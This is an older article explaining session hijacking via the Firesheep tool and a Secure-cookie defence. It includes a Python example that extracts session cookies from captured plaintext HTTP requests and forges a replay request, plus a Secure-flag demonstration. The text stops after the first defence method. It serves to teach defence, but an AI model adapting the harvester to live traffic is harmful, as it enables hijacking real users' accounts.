Techniques for defending against session hijacking
  Added: 03/16/2011   Published: 03/16/2011
Page 1 of 2
 

Attackers can use Firesheep to eavesdrop on unencrypted traffic on a wireless network and steal the login sessions of other users on popular websites. With this tool an attacker can operate the accounts of users who are logged in to those sites, the well-known Facebook among them. What the tool exploits is in fact a weakness that insiders have known about for a long time: session hijacking. To this day it has still not been fully resolved.

 

This article first discusses the mechanism behind web authentication, because it is that mechanism that allows session hijacking to succeed. It then looks at how Firesheep exploits the weakness, and in the final section discusses the measures that website administrators, web developers and end users can take to protect themselves.

 

Web authentication basics

 

1. The website needs to authenticate the user.

 

2. The user authenticates with a username and password.

 

3. The website verifies the user's password. If it is correct, the user is allowed to log in and the site sends a cookie to the user's browser. This cookie uniquely identifies the session.

 

4. The user keeps browsing the site. Each time the user requests a new page, the browser sends the cookie along with the request, which tells the web server that this request belongs to the session that was authenticated earlier.

 

In most cases web developers and site administrators use HTTPS to protect step 2 of this process, because they all know that anyone who can obtain another user's username and password can easily gain access to the account. In many cases, however, they then switch to an unencrypted HTTP connection for the rest of the web traffic, including the exchange of the cookie.

 

Session hijacking attacks and Firesheep

 

Here is how a session hijacking attack works. If an eavesdropper manages to intercept any of the traffic exchanged in step 4, he can easily read the cookie. Once he knows the contents of the cookie, the eavesdropper can forge an HTTP request that carries the same cookie and use it to access the user's account.

 

Many well-known websites, including social networking sites such as Facebook, are exposed to this kind of attack. Online banks and some e-commerce sites, on the other hand, encrypt all of their traffic. Social networking sites have not treated session hijacking as a real threat.

 

Someone who wants to steal another person's session first connects to an open wireless network, starts Firesheep, and waits for vulnerable users to appear on the screen. If an attractive target shows up, the attacker simply clicks on that user's name and gains full access to the user's session.
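How the interception in step 4 turns into a forged request, as an added example that is not part of the original article and not Firesheep's own code: the captured packets, host names and cookie names below are constructed, and the small per-site handler table stands in for the site-specific handlers a sniffer would ship with. The third capture is a TLS record, i.e. what the same request looks like when the site uses HTTPS throughout, and yields nothing.

```python
"""
Harvesting session cookies from unencrypted HTTP traffic the way a sniffer
such as Firesheep does, then building the replayed request that takes over
the session.  Added example; hosts, cookie names and packets are constructed.
"""
import re

# Per-site "handlers": which cookies make up a session on which host.
# Hypothetical sites and cookie names, not any real site's.
HANDLERS = {
    "social.example": ["sid", "uid"],
    "mail.example": ["session_token"],
}

# Constructed packets as an eavesdropper on an open Wi-Fi network sees them:
# two plaintext HTTP requests, one TLS record (an HTTPS request, which starts
# with a binary record header rather than ASCII), and one request without
# any cookie (a visitor who is not logged in).
CAPTURED = [
    b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: sid=a1b2c3d4e5; uid=1234; theme=dark\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
    b"Cookie: session_token=9f8e7d6c\r\n\r\n",
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 20,
    b"GET /public HTTP/1.1\r\nHost: social.example\r\n\r\n",
]


def parse_http_request(raw):
    """Return (method, path, headers) for a plaintext HTTP request, or None
    if the bytes are not one (for example a TLS record from HTTPS traffic)."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = re.match(r"^([A-Z]+) (\S+) HTTP/1\.[01]$", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return m.group(1), m.group(2), headers


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}"""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def harvest_sessions(captures):
    """Step 4 seen from the attacker's side: every plaintext request carries
    the cookie, so collect the session cookies for any host we handle."""
    sessions = []
    for raw in captures:
        parsed = parse_http_request(raw)
        if parsed is None:
            continue                      # encrypted or not HTTP: nothing to steal
        _, _, headers = parsed
        host = headers.get("host", "")
        wanted = HANDLERS.get(host)
        if not wanted or "cookie" not in headers:
            continue
        cookies = parse_cookie_header(headers["cookie"])
        if not all(name in cookies for name in wanted):
            continue                      # incomplete session, skip it
        sessions.append({"host": host,
                         "cookies": {n: cookies[n] for n in wanted}})
    return sessions


def forge_request(session, path="/"):
    """The replay: the attacker's own GET carrying the victim's cookie,
    which the server cannot distinguish from the victim's request."""
    cookie = "; ".join(f"{n}={v}" for n, v in session["cookies"].items())
    return (f"GET {path} HTTP/1.1\r\nHost: {session['host']}\r\n"
            f"Cookie: {cookie}\r\n\r\n").encode("ascii")


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURED):
        print(s["host"], s["cookies"])
        print(forge_request(s, "/home").decode())
```

Nothing in the forged request identifies the attacker: the server authenticates the cookie, not the client, which is why the sniffer does not need the password at all.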

 

Defending against Firesheep and other session hijacking attacks

 

The best defence against Firesheep and other session hijacking attacks lies with web developers and web server administrators. If you develop a web application that relies on cookies for session management, make sure the session is managed in a secure way. Here are a couple of methods:

 

1. Send the cookie only over SSL. If you instruct the browser to transmit the cookie only over an encrypted connection (the cookie's Secure attribute), it cannot easily be intercepted.
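The Secure attribute at work, covering both the cookie exchange of steps 3 and 4 above and method 1 here. This is an added example, not code from the original article; the site and cookie names are constructed, and the browser is modelled by a small function that applies the standard Secure rule rather than by a real browser.

```python
"""
Method 1: mark the session cookie Secure so the browser sends it only over
HTTPS.  Added example; host and cookie names are constructed.
"""
from urllib.parse import urlsplit

SITE = "social.example"          # hypothetical site


def set_cookie_header(name, value, secure):
    """Set-Cookie header the server emits after a successful login (step 3).
    With secure=False the cookie rides on every request, HTTP included."""
    attrs = [f"{name}={value}", "Path=/"]
    if secure:
        attrs.append("Secure")    # browser sends it only over TLS
    return "; ".join(attrs)


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.lower()] = v if v else True
    return name, value, attrs


def cookie_header_for(set_cookies, url):
    """What the browser puts in the Cookie header of a request to url
    (step 4): a cookie flagged Secure is never sent on an http:// request.
    Returns None when nothing would be sent."""
    scheme = urlsplit(url).scheme
    sent = []
    for h in set_cookies:
        name, value, attrs = parse_set_cookie(h)
        if attrs.get("secure") and scheme != "https":
            continue
        sent.append(f"{name}={value}")
    return "; ".join(sent) or None


def audit_session_cookies(set_cookies, session_names):
    """Server-side check to run against your own login response: any
    session cookie without Secure will travel in the clear."""
    findings = []
    for h in set_cookies:
        name, _, attrs = parse_set_cookie(h)
        if name in session_names and not attrs.get("secure"):
            findings.append(f"{name}: missing Secure attribute")
    return findings


if __name__ == "__main__":
    weak = [set_cookie_header("sid", "a1b2c3d4e5", secure=False)]
    hard = [set_cookie_header("sid", "a1b2c3d4e5", secure=True)]
    for label, jar in (("weak", weak), ("hardened", hard)):
        print(label, "http: ", cookie_header_for(jar, f"http://{SITE}/home"))
        print(label, "https:", cookie_header_for(jar, f"https://{SITE}/home"))
    print(audit_session_cookies(weak, {"sid"}))
```

With the flag set, the http:// request carries no cookie, so an eavesdropper sees nothing usable; but that same request also reaches the server unauthenticated, so the site has to serve every page over HTTPS (redirecting HTTP to HTTPS) or logged-in users will suddenly appear logged out.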

 
